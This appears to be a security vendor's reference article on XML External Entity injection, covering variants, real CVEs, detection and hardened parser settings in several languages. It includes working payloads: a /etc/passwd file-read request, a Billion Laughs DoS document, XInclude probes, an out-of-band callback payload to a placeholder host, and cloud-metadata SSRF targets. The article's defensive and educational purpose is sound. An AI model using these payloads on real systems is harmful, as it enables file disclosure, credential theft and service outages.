Severity: High

XXE — XML External Entity Injection

CWE-611 | A05:2021 | CVSS 7.5 | 12 min

XXE (CWE-611) exploits XML parsers that resolve external entities, enabling file disclosure, SSRF, and, in some configurations, RCE. Disallowing DOCTYPE declarations in the parser removes the entity-based variants; XInclude has to be disabled separately.

External entities in XML DTD let attackers read arbitrary files via file:///etc/passwd — one parser flag eliminates this
Nine variant families: classic file read, blind OOB, error-based local DTD, XInclude, SSRF pivot, SVG/DOCX upload, SAML, XSLT, Billion Laughs DoS
CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0) and CVE-2024-34102 (Adobe Commerce, CVSS 9.8) confirm the attack class is actively exploited
XInclude bypasses DOCTYPE filters — disable entity processing and XInclude independently
Primary defense: disallow-doctype-decl: true (Java) / defusedxml (Python) / DtdProcessing.Prohibit (.NET)

What is XML External Entity Injection?

The XML specification includes a Document Type Definition (DTD) mechanism that allows XML documents to define named entity shortcuts — references that the parser substitutes with their defined value during processing. One variant, external entities, instructs the parser to fetch content from an external URI and inline it into the document. XML External Entity Injection (XXE, CWE-611) occurs when an application parses attacker-controlled XML and a misconfigured parser resolves these external entity references without restriction.

The attack surface is broader than most engineers expect. Beyond traditional REST APIs with Content-Type: application/xml, XXE exists in SOAP services, SAML SSO flows, file upload endpoints accepting SVG and Office formats (DOCX/XLSX/ODT), PDF processors handling XFA forms, RSS/Atom feed parsers, and XML-RPC endpoints. Any code path that passes untrusted XML through an unprotected parser is an XXE entry point.

OWASP classified XXE under A05:2021 (Security Misconfiguration) rather than A03 (Injection) because the root cause is a parser misconfiguration, not a language-level injection flaw. The XML specification itself is not broken — parsers simply ship with external entity resolution enabled by default in many frameworks, and developers rarely explicitly disable it. CVE-2025-66516 (Apache Tika, CVSS 10.0) and CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8, approximately 170,000 affected stores) demonstrate that XXE remains actively exploited at critical severity in 2025.

Mechanism

The attack exploits the XML parser's entity resolution step. When the parser encounters &entityname; in document content, it looks up the entity definition and substitutes the resolved value. For external entities defined with the SYSTEM keyword, the parser fetches the specified URI and uses its contents as the substitution value.

The exploit chain proceeds in five steps:

1. The attacker submits XML containing a <!DOCTYPE> declaration defining an external entity: <!ENTITY xxe SYSTEM "file:///etc/passwd">.
2. The parser encounters the DOCTYPE, parses the entity definition, and records the external URI.
3. When the parser encounters &xxe; in the document body, it fetches file:///etc/passwd from the local filesystem.
4. The fetched content is substituted into the parsed document tree.
5. The application returns the parsed content in the HTTP response, including the file contents.

A minimal exploitation example:

POST /api/products HTTP/1.1
Host: shop.example.com
Content-Type: application/xml
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<productSearch>
  <query>&xxe;</query>
</productSearch>

HTTP/1.1 200 OK
Content-Type: application/json
 
{"results": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n..."}

The entity value replaces &xxe; in the <query> element, and the application reflects the parsed value in its response.
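
The five steps can be mimicked with a deliberately tiny model. This is a sketch for intuition only, not how a real XML parser is implemented: the regexes, the `expand_external_entities` function, and the `fake_fs` dictionary are all assumptions made for illustration, and nothing here touches the real filesystem.

```python
import re

# Matches declarations such as <!ENTITY xxe SYSTEM "file:///etc/passwd">
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"([^"]*)"\s*>')
# Matches references such as &xxe;
ENTITY_REF = re.compile(r"&(\w+);")


def expand_external_entities(document, fetch):
    """Toy model of steps 2-4: record declarations, then substitute references."""
    declared = dict(ENTITY_DECL.findall(document))   # step 2: name -> URI
    _, sep, tail = document.partition("]>")          # split off the DOCTYPE
    body = tail if sep else document

    def substitute(match):
        name = match.group(1)
        if name in declared:
            return fetch(declared[name])             # step 3: "fetch" the URI
        return match.group(0)                        # leave other references alone

    return ENTITY_REF.sub(substitute, body)          # step 4: inline the content


# Hypothetical in-memory stand-in for the server's filesystem.
fake_fs = {"file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash"}

payload = (
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    "<productSearch><query>&xxe;</query></productSearch>"
)
expanded = expand_external_entities(payload, fake_fs.__getitem__)
print(expanded)
```

The `fetch` callback is the whole vulnerability in miniature: whoever controls the declaration controls which URI the server-side code dereferences.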

Attack Variants

| Variant | Technique | Impact | Blind? |
| --- | --- | --- | --- |
| Classic file disclosure | `SYSTEM "file:///etc/passwd"` reflected in response | Local file read | No |
| SSRF via XXE | `SYSTEM "http://169.254.169.254/..."` | Internal network access, cloud metadata theft | Sometimes |
| Blind OOB | Two-stage parameter entity + external DTD | File exfiltration via DNS/HTTP callback | Yes |
| Error-based local DTD | Local DTD reuse, file content in error message | File read without OOB infrastructure | No (error channel) |
| XInclude injection | `xi:include href="file:///etc/passwd"` (no DOCTYPE needed) | File read, bypasses DOCTYPE filters | No |
| SVG upload XXE | Malicious SVG processed by Batik/ImageMagick | Server file read via avatar/image upload | Sometimes |
| DOCX/XLSX XXE | XML files inside OOXML ZIP archive | Server file read when document is parsed | Sometimes |
| SAML XXE | XXE in SAML AuthnRequest or metadata | Auth bypass, credentials disclosure | Sometimes |
| Billion Laughs DoS | Nested entity expansion (10^9 expansions) | Memory exhaustion, service crash | No |

Classic in-band XXE is the simplest form: the entity resolves a file:// URI and the content appears directly in the HTTP response. Any file readable by the application process user is accessible — /etc/passwd, application configuration files, private keys, database credentials.

SSRF via XXE pivots the parser as an HTTP client. Replacing file:// with http:// causes the parser to issue outbound HTTP requests. Against cloud instances that still allow IMDSv1, http://169.254.169.254/latest/meta-data/iam/security-credentials/ lists the attached IAM role, and appending the role name returns temporary AWS credentials without authentication. Internal services unreachable from the internet are reachable through the XML parser's outbound connection.
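
When triaging logged payloads, it can help to label what a SYSTEM identifier would actually reach. The following is a minimal sketch using only the standard library; the function name `classify_system_id` and its label strings are invented for this example, and a DNS name is reported as-is because judging it would require resolution.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_system_id(uri):
    """Label an external-entity URI by the kind of resource it would reach."""
    parts = urlsplit(uri)
    scheme = parts.scheme.lower()
    if scheme == "file":
        return "local-file"
    if scheme not in ("http", "https", "ftp"):
        return "other-scheme"
    host = parts.hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "network-hostname"      # a DNS name: needs resolution to judge
    if addr.is_link_local:
        return "cloud-metadata-range"  # 169.254.0.0/16 includes 169.254.169.254
    if addr.is_private or addr.is_loopback:
        return "internal-address"
    return "public-address"


for candidate in (
    "file:///etc/passwd",
    "http://169.254.169.254/latest/meta-data/",
    "http://internal-service/",
):
    print(candidate, "->", classify_system_id(candidate))
```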

Blind OOB XXE applies when the server parses XML but does not return entity content in the HTTP response. Parameter entities make the server fetch an attacker-hosted DTD, which instructs the parser to exfiltrate file content to a second OOB endpoint. BreachVex uses unique out-of-band callback tokens per probe to correlate callbacks with specific payloads.
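
Per-probe token correlation can be sketched in a few lines. This is an illustrative model, not BreachVex's implementation: `ProbeRegistry`, its methods, and the `oob.example.test` listener domain are hypothetical names chosen for the example.

```python
import secrets

CALLBACK_DOMAIN = "oob.example.test"  # hypothetical listener domain


class ProbeRegistry:
    """Remembers which probe each random token was issued for."""

    def __init__(self):
        self._probes = {}

    def new_probe(self, endpoint, payload_kind):
        token = secrets.token_hex(8)  # 16 lowercase hex characters
        self._probes[token] = (endpoint, payload_kind)
        return token, f"http://{token}.{CALLBACK_DOMAIN}/probe"

    def match_callback(self, observed_host):
        """Return the (endpoint, payload_kind) behind a callback, or None."""
        host = observed_host.lower().rstrip(".")
        suffix = "." + CALLBACK_DOMAIN
        if not host.endswith(suffix):
            return None
        token = host[: -len(suffix)].split(".")[-1]  # label next to the domain
        return self._probes.get(token)


registry = ProbeRegistry()
token, url = registry.new_probe("/api/products", "blind-oob")
print(url)
print(registry.match_callback(f"{token}.{CALLBACK_DOMAIN}."))
```

Because each token is issued once, a DNS or HTTP hit on that hostname identifies both the endpoint and the payload that triggered it, even when the callback arrives long after the request.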

Error-based local DTD reuse is preferred when OOB infrastructure is unavailable. It references a DTD file that already exists on the target server, redefines a parameter entity within it, and crafts a chain triggering a parse error that contains the target file's contents. Linux systems commonly have /usr/share/yelp/dtd/docbookx.dtd; Windows systems have C:\Windows\System32\wbem\xml\CIM_DTD_V20.dtd.

XInclude injection bypasses defenses that block <!DOCTYPE patterns. XInclude uses namespace-qualified elements (xmlns:xi="http://www.w3.org/2001/XInclude") instead of DOCTYPE declarations. Disabling entity processing does not disable XInclude processing — both must be configured independently.
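
Because XInclude is matched by namespace rather than by prefix or DOCTYPE, a filter has to look for the namespace URI itself. A minimal sketch, assuming Python's standard-library ElementTree (which does not perform XInclude processing while parsing); `find_xinclude_targets` is a name invented for this example.

```python
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def find_xinclude_targets(xml_text):
    """Return the href of every XInclude include element in the document."""
    root = ET.fromstring(xml_text)
    tag = f"{{{XINCLUDE_NS}}}include"   # ElementTree's {namespace}localname form
    return [element.get("href") for element in root.iter(tag)]


probe = (
    '<root xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    "</root>"
)
print(find_xinclude_targets(probe))
```

Matching on the namespace means a renamed prefix (for example `inc:include`) is still caught, which a string search for `xi:include` would miss.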

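Billion Laughs DoS exploits nested internal entity expansion to exhaust parser memory and CPU. (XML forbids truly recursive entities, so the payload stacks definitions instead: each entity references the previous one several times.) No external network access or file:// URI is needed; the attack is self-contained within the DTD: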

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>

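Each definition multiplies the previous one by ten, so the four-entity chain shown above expands to 10^3 = 1,000 "lol" strings. Extending the same pattern to ten entities yields 10^9 copies (roughly 3 GB of text), exhausting memory and CPU before the document finishes parsing. defusedxml blocks this by default; lxml keeps libxml2's expansion limits as long as huge_tree is left at its default of False; Java requires setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true).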
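
The growth can be checked without ever expanding anything. The sketch below computes the expanded size of an entity from its definitions using memoization; `expanded_length`, `chain_length`, and the regexes are assumptions made for this example, the level count treats `lol` itself as level 1, and the helper expects a well-formed, non-cyclic DTD.

```python
import re

ENTITY_DEF = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&(\w+);")


def expanded_length(dtd, name):
    """Length in characters of entity `name` after full expansion."""
    definitions = dict(ENTITY_DEF.findall(dtd))
    cache = {}

    def length(entity):
        if entity not in cache:
            value = definitions[entity]
            literal = len(ENTITY_REF.sub("", value))          # plain text
            nested = sum(length(ref) for ref in ENTITY_REF.findall(value))
            cache[entity] = literal + nested
        return cache[entity]

    return length(name)


def chain_length(levels, fanout=10, seed_len=3):
    """Closed form for a chain where each level repeats the previous `fanout` times."""
    return seed_len * fanout ** (levels - 1)


# The same four definitions as the payload above, built compactly.
SAMPLE_DTD = "\n".join([
    '<!ENTITY lol "lol">',
    '<!ENTITY lol2 "' + "&lol;" * 10 + '">',
    '<!ENTITY lol3 "' + "&lol2;" * 10 + '">',
    '<!ENTITY lol4 "' + "&lol3;" * 10 + '">',
])

print(expanded_length(SAMPLE_DTD, "lol4"))   # 3000 characters = 1,000 copies of "lol"
print(chain_length(10))                      # 3000000000 characters for ten levels
```

A document of a few hundred bytes therefore asks the parser to materialize gigabytes, which is why limits on entity expansion, or a ban on DOCTYPE altogether, matter more than input size limits.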

Real-World Examples

CVE-2024-34102 — Adobe Commerce CosmicSting (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

The most widely exploited XXE vulnerability of 2024. Adobe Commerce's REST API accepted XML bodies without disabling external entity resolution. Sansec researchers demonstrated a five-step RCE chain: XXE reads app/etc/env.php → extracts crypt/key → forges admin JWT → admin REST API → code-on-demand RCE. Approximately 170,000 unpatched stores were vulnerable. Within 72 hours of public disclosure, threat actors compromised more than 4,275 e-commerce stores. The attack required no authentication and no user interaction. CVE-2024-34102 was presented at Black Hat USA 2024 and remains the canonical example of XXE chaining to full system compromise.

CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)

Apache Tika is a widely used server-side content extraction library, powering document ingestion in enterprise search, RAG pipelines, and file processing services. Versions before 3.2.2 processed XFA (XML Forms Architecture) content inside PDF documents without disabling external entity resolution. Any application using an affected Tika version to process attacker-supplied PDFs is vulnerable, including AI document ingestion pipelines, which represent a new high-value attack surface. Upgrade to Apache Tika 3.2.2 or later.

CVE-2024-22024 — Ivanti Connect Secure SAML (CVSS 8.3)

Ivanti's VPN product processed SAML AuthnRequests at /dana-na/auth/saml-sso.cgi without disabling external entity resolution, giving unauthenticated attackers access to restricted resources. The flaw surfaced weeks after the same product line was hit by CVE-2023-46805 (authentication bypass), which attackers chained with CVE-2024-21887 (command injection) for unauthenticated RCE against thousands of enterprise VPN concentrators deployed globally.

CVE-2024-45409 — ruby-saml (CVSS 10.0)

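ruby-saml (used by GitLab and thousands of Ruby applications) did not properly verify the signature of SAML responses, so an attacker holding any validly signed SAML document could forge assertions and authenticate as an arbitrary user. This is a signature-verification flaw rather than an entity-resolution bug, but it has the same root: security decisions that depend on how an XML parser interprets attacker-controlled markup. In 2025, GitHub Security Lab reported a related bypass class in the same library (CVE-2025-25291 and CVE-2025-25292) based on an XML parser differential. Nokogiri (signature verification) and REXML (claim extraction) parse the same XML document differently, so an attacker can craft a document that passes signature verification but presents forged claims, achieving authentication bypass with no traditional injection in the document.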

HackerOne #1113539 — Rockstar Games XLSX Import (High)

An Excel import feature on the Rockstar Games web portal processed .xlsx files server-side. The attacker modified the XML files inside the OOXML ZIP archive to inject XXE payloads. When uploaded and processed, the server made OOB callbacks confirming XXE, then disclosed server-side file contents via in-band payloads.

HackerOne #409370 — Shopify SAML XXE (Critical)

Shopify's SAML SSO authentication flow parsed XML assertions without disabling external entity resolution. The attacker provided a crafted SAML response with an OOB XXE payload, which triggered file read callbacks from Shopify's application servers.

CosmicSting (CVE-2024-34102) pattern: XXE does not need to directly return file contents to cause critical impact. The chain reads a configuration file, extracts a cryptographic key, and forges admin authentication tokens, which in turn unlock the admin REST API and code execution, all with no user interaction required. Always assess the full impact chain, not just the file read primitive.

Detection

Manual Testing

Identify all XML entry points: REST APIs with Content-Type: application/xml, SOAP services (/ws/, /soap/, /services/), SAML SSO endpoints, file upload flows accepting SVG/DOCX/XLSX/ODT/PDF, RSS/Atom feeds, and XML-RPC.
Send a baseline probe to confirm XML acceptance:
```
<?xml version="1.0" encoding="UTF-8"?>
<root><data>test</data></root>
```
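A 415 Unsupported Media Type response means XML is rejected. Any other status suggests the endpoint may process XML and is worth probing further; a 400 that changes with the body content is a particularly strong hint that a parser ran.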
Test entity expansion with an in-band canary:
```
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY test "XXECANARY123">]>
<root><data>&test;</data></root>
```
If XXECANARY123 appears in the response, entity expansion is active.

Attempt SYSTEM entity file read:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>

File contents in the response confirm classic in-band XXE.

For blind contexts, use Interactsh or Burp Collaborator:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/probe"> %xxe;]>
<root/>

Test XInclude independently:

<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</root>
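
The decision logic behind these probes can be captured in a small helper that runs offline against recorded responses. This is a rough sketch under stated assumptions: `interpret_probe`, the stage names, and the returned labels are invented for illustration, and the passwd pattern is a heuristic that only recognizes a typical root entry.

```python
import re

CANARY = "XXECANARY123"
# Heuristic for a root entry such as root:x:0:0:..., wherever it appears in the body.
PASSWD_ENTRY = re.compile(r"\broot:[^:\s]*:0:0:")


def interpret_probe(stage, status, body):
    """Map one recorded probe response to a coarse finding."""
    if stage == "baseline":
        return "xml-rejected" if status == 415 else "xml-possibly-accepted"
    if stage == "canary":
        return "entity-expansion-active" if CANARY in body else "no-expansion-seen"
    if stage in ("file-read", "xinclude"):
        return "file-disclosure" if PASSWD_ENTRY.search(body) else "no-disclosure-seen"
    raise ValueError(f"unknown stage: {stage}")


recorded = '{"results": "root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:..."}'
print(interpret_probe("file-read", 200, recorded))
```

Blind contexts are deliberately absent: their evidence arrives on the out-of-band listener, not in the HTTP response, so they need callback correlation rather than body inspection.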

Automated Detection

Burp Suite Pro active scanner includes XXE checks using Burp Collaborator for OOB detection across XML endpoints, SOAP services, and file upload flows.

XXEinjector (Ruby) automates in-band and OOB XXE testing with payloads for multiple content types and file formats.

Nuclei templates (vulnerabilities/xxe/) include CVE-specific XXE templates. Custom templates can target application-specific XML endpoints.

Semgrep static rules python.lang.security.audit.xml-dtd and java.lang.security.audit.xxe flag unsafe parser configurations before deployment.

BreachVex detects XXE through a staged sequence of complementary checks: XML acceptance, entity-expansion canary, SYSTEM-entity file read, out-of-band callback correlation, and error-based local-DTD probing on known OS paths. Lower-signal results (DNS-only callbacks) are flagged for review, while data-exfiltration evidence is auto-reported.

Prevention

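Disallowing DOCTYPE declarations at the parser level eliminates classic XXE, blind OOB XXE, error-based XXE, and Billion Laughs DoS with a single configuration change. Disabling only external entity resolution stops the file-read and SSRF variants but leaves internal entity expansion, and therefore Billion Laughs, in place. XInclude must be disabled separately.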

Java (JAXP — DocumentBuilderFactory)

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// VULNERABLE: a default DocumentBuilderFactory resolves external entities
DocumentBuilderFactory unsafeDbf = DocumentBuilderFactory.newInstance();
DocumentBuilder unsafeDb = unsafeDbf.newDocumentBuilder();
Document unsafeDoc = unsafeDb.parse(inputStream);  // XXE possible

// SAFE: disallow DOCTYPE entirely (blocks entity-based XXE and entity-expansion DoS)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// The next three features are defense in depth in case DOCTYPE is ever re-enabled
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);        // XInclude is configured separately from DOCTYPE
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream);  // a document containing a DOCTYPE now fails to parse

Python (defusedxml — recommended)

# NOTE: xml.etree.ElementTree does not resolve external entities; a reference to
# one raises ParseError (undefined entity), so it is safe against classic XXE.
# It can still be exposed to Billion Laughs DoS via nested internal entity
# expansion when Python is linked against an Expat older than 2.4.1.
# Use defusedxml for belt-and-suspenders protection against both XXE and DoS.
import xml.etree.ElementTree as ET
tree = ET.parse(untrusted_xml)  # safe for XXE; may be vulnerable to Billion Laughs DoS

# SAFE: defusedxml rejects external entities and entity declarations by default
from defusedxml import ElementTree as DefusedET
tree = DefusedET.parse(untrusted_xml)   # raises on XXE and Billion Laughs payloads

# SAFE: lxml with explicit hardening
from lxml import etree
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False,
    huge_tree=False,   # the default; keeps libxml2's built-in expansion limits on
)
root = etree.fromstring(xml_bytes, parser=parser)  # returns the root element
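
Where adding a dependency is not an option, the "reject any DOCTYPE" policy can be approximated with the standard library alone. This is a minimal sketch, not a replacement for defusedxml: `DoctypeForbidden` and `parse_without_dtd` are names invented here, and the approach parses the input twice (one Expat pass to look for a DOCTYPE, one ElementTree pass to build the tree).

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Expat calls this when it reaches <!DOCTYPE ...>, before any content
    # (and therefore before any entity reference) is processed.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_without_dtd(data):
    """Parse XML bytes, refusing any document that declares a DOCTYPE."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)      # first pass: the handler's exception propagates
    return ET.fromstring(data)     # second pass: build the tree


root = parse_without_dtd(b"<root><data>test</data></root>")
print(root.find("data").text)

try:
    parse_without_dtd(
        b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b"<root>&xxe;</root>"
    )
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

Rejecting on the DOCTYPE itself, rather than on specific entity patterns, covers external entities, parameter entities, and nested internal entities with one rule.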

.NET (XmlDocument / XmlReader)

using System.Xml;

// VULNERABLE on .NET Framework versions before 4.5.2, where XmlDocument's
// XmlResolver defaults to XmlUrlResolver
var unsafeDoc = new XmlDocument();
unsafeDoc.Load(inputStream);  // XXE possible on older .NET Framework

// SAFE: explicitly null the resolver
var doc = new XmlDocument { XmlResolver = null };
doc.Load(inputStream);  // blocks external entity resolution

// SAFE: XmlReader with DTD prohibition (preferred for streaming)
var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,  // any DOCTYPE throws XmlException
    XmlResolver = null,
    MaxCharactersFromEntities = 1024  // nonzero cap; 0 would mean "no limit"
};
using var reader = XmlReader.Create(inputStream, settings);

PHP

// VULNERABLE: LIBXML_NOENT enables entity substitution, including external entities
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NOENT);  // LIBXML_NOENT is dangerous

// SAFE: without LIBXML_NOENT entities are not substituted; LIBXML_NONET additionally
// blocks network access (on its own it would not block file://)
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);

// SAFE (PHP < 8.0): disable external entity loading globally
libxml_disable_entity_loader(true);
$dom = new DOMDocument();
$dom->loadXML($xml);
// PHP 8.0+: libxml_disable_entity_loader() is deprecated because libxml2 2.9.0+
// no longer loads external entities by default. The same caution applies to
// SimpleXML and XMLReader: never enable entity substitution (LIBXML_NOENT) for
// untrusted input, and pass LIBXML_NONET as defense in depth.

Node.js (fast-xml-parser)

// fast-xml-parser: 15M+ weekly downloads, a very common Node.js XML library
const { XMLParser } = require('fast-xml-parser');

// RISKY: default config; older versions may process entities
const defaultParser = new XMLParser();
const unsafeResult = defaultParser.parse(xmlString);

// SAFE: disable entity processing explicitly (fast-xml-parser >= 4.2.0)
const hardenedParser = new XMLParser({
    processEntities: false,  // disables entity substitution
    htmlEntities: false,     // disables HTML entity processing
});
const result = hardenedParser.parse(xmlString);

Egress filtering as defense-in-depth: Restricting outbound connections from XML-processing services blocks OOB data exfiltration for blind XXE and SSRF pivots. This does not prevent file:// reads, but it removes the attacker's ability to receive exfiltrated data via DNS/HTTP callbacks. A WAF such as ModSecurity can add a detection layer by flagging <!DOCTYPE and <!ENTITY declarations in request bodies. Neither control replaces parser hardening; both add depth.

Frequently Asked Questions

What is XML External Entity (XXE) injection?

XXE injection occurs when an XML parser resolves external entity references embedded in attacker-controlled input. The XML DTD specification allows entities that reference external URIs — when the parser fetches those URIs, it enables file read (file:///etc/passwd), SSRF (http://internal-service/), and in some configurations RCE. CWE-611 classifies this as Improper Restriction of XML External Entity Reference. OWASP absorbed XXE into A05:2021 (Security Misconfiguration) because vulnerable parsers almost always ship misconfigured, not broken.

What is the difference between XXE and SSRF?

XXE and SSRF are distinct vulnerability classes that chain together. XXE is an XML parsing flaw that forces the server to resolve an external entity pointing to any URI scheme (file://, http://, ftp://, gopher://). When that URI points to an internal service, the XXE becomes a SSRF pivot — the XML parser acts as the HTTP client. SSRF can also occur independently without any XML involvement. XXE-to-SSRF is a chain, not a synonym.

What OWASP category covers XXE in 2025?

XXE is classified under OWASP Top 10 A05:2021 — Security Misconfiguration. Prior to the 2021 update, XXE had its own category (A04:2017). The reclassification reflects that XXE is not a design flaw in the XML specification itself, but a configuration failure — parsers ship with external entity resolution enabled by default in many frameworks, and developers fail to disable it.

Which XML parsers are vulnerable to XXE by default?

Exposure depends on the exact version and flags in use. Commonly vulnerable setups: Java's DocumentBuilderFactory and SAXParserFactory with default settings; PHP's DOMDocument when the LIBXML_NOENT flag is passed; Node.js libxmljs2 when noent: true is set; .NET Framework XmlDocument before 4.5.2, where XmlResolver is not null by default; and Ruby's Nokogiri with the noent option. Python's stdlib xml.etree and xml.dom.minidom do not resolve external entities, but they can still be exposed to Billion Laughs DoS on older Expat builds. Safe alternatives: Java (disable DOCTYPE), Python (defusedxml), PHP (LIBXML_NONET without LIBXML_NOENT), .NET (XmlReaderSettings with DtdProcessing.Prohibit).

Can XXE lead to Remote Code Execution?

XXE can chain to RCE through several paths: (1) CosmicSting (CVE-2024-34102) — XXE reads app/etc/env.php, extracts crypt key, forges admin JWT, then code-on-demand RCE; (2) XSLT extension functions — PHP XSL with registerPHPFunctions() allows XSLT to call arbitrary PHP functions including system(); (3) SAML XXE reads Kerberos keytab for offline cracking to AD admin; (4) XXE reads database credentials for application-layer privilege escalation. Direct RCE from XXE alone is rare — it usually requires a vulnerable application logic chain.

What is blind OOB XXE?

Blind OOB (Out-of-Band) XXE occurs when the XML parser resolves external entities but the server does not return entity content in the HTTP response. Attackers use two-stage parameter entity chains: the target server fetches an attacker-hosted DTD, which instructs the parser to exfiltrate file content to a second OAST callback URL. Tools like Interactsh (oast.pro) or Burp Collaborator capture the DNS and HTTP callbacks. A DNS-only callback is weak evidence and is rated potential (confidence 0.30), because resolvers and security appliances can trigger lookups on their own; an HTTP callback that carries file data is rated confirmed (confidence 0.98).

What is error-based XXE with local DTD reuse?

Error-based local DTD reuse is an XXE technique that requires no external OOB infrastructure. It references a DTD file already on the target server filesystem (e.g., /usr/share/yelp/dtd/docbookx.dtd on Linux), redefines a parameter entity from that DTD, and crafts a chain that causes the parser to include file content in an error message. This technique is valuable in environments with strict egress filtering blocking OOB callbacks.

How do I test for XXE manually?

1. Send a benign XML probe — if not 415, XML is accepted. 2. Inject a local entity canary: <!DOCTYPE foo [<!ENTITY test 'XXECANARY'>]><root>&test;</root> — if XXECANARY appears in response, entity expansion is active. 3. Test SYSTEM entity: file:///etc/passwd in entity value — file contents confirm classic XXE. 4. For blind: use Interactsh URL in entity value and monitor for DNS/HTTP callbacks. 5. Test XInclude separately with xi:include element.

What is XInclude injection and why is it different from classic XXE?

XInclude is a W3C standard for XML document composition that allows including external files using xi:include elements — without requiring a DOCTYPE declaration. An attacker who can inject XML content can use XInclude to read files, bypassing defenses that block DOCTYPE-based XXE. XInclude must be explicitly disabled via setXIncludeAware(false) in Java — disabling DOCTYPE alone is insufficient.

How does file upload XXE work?

File upload XXE occurs when an application accepts XML-based file formats (SVG, DOCX, XLSX, ODT, PDF with XFA) and processes them server-side. SVG files are processed by Apache Batik. DOCX/XLSX files contain XML inside OOXML ZIP archives processed by Apache POI or openpyxl. PDF with XFA forms is processed by Apache Tika (CVE-2025-66516, CVSS 10.0). The attack requires no modification of HTTP headers — only the file content matters.
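
For ZIP-based formats, one inexpensive pre-check is to look inside the archive before any document library touches it. The sketch below is a heuristic under stated assumptions: `find_dtd_parts`, `MAX_PART_BYTES`, and the marker list are invented for this example, it only matches ASCII-compatible encodings (a UTF-16 part would slip past the byte search), and it complements parser hardening rather than replacing it.

```python
import io
import zipfile

DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")
MAX_PART_BYTES = 8 * 1024 * 1024   # arbitrary inspection cap; tune per workload


def find_dtd_parts(archive_bytes):
    """Return names of XML parts in a ZIP container that look unsafe to parse."""
    suspicious = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue                      # skip images and other binary parts
            with archive.open(info) as part:
                data = part.read(MAX_PART_BYTES + 1)
            too_large = len(data) > MAX_PART_BYTES   # cannot be fully inspected
            if too_large or any(marker in data for marker in DTD_MARKERS):
                suspicious.append(info.filename)
    return suspicious


# Build a tiny XLSX-like archive in memory to exercise the check.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as demo:
    demo.writestr("[Content_Types].xml", "<Types/>")
    demo.writestr(
        "xl/workbook.xml",
        '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        "<workbook>&xxe;</workbook>",
    )
    demo.writestr("xl/media/image1.png", b"\x89PNG")

print(find_dtd_parts(buffer.getvalue()))
```

Treating oversized parts as suspicious closes the obvious bypass of padding the file so that the declaration falls outside the inspected window.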

What is the single most effective XXE prevention?

Disable DOCTYPE processing entirely at the parser level. In Java JAXP: setFeature('http://apache.org/xml/features/disallow-doctype-decl', true). In Python: use defusedxml instead of stdlib xml modules — it blocks all XXE patterns by default. In .NET: set DtdProcessing = DtdProcessing.Prohibit and XmlResolver = null. In PHP: never pass LIBXML_NOENT; use LIBXML_NONET. This single configuration change eliminates classic XXE, blind OOB XXE, error-based XXE, and Billion Laughs DoS simultaneously. XInclude must be disabled separately.

What CVEs represent the most severe XXE vulnerabilities in 2024-2025?

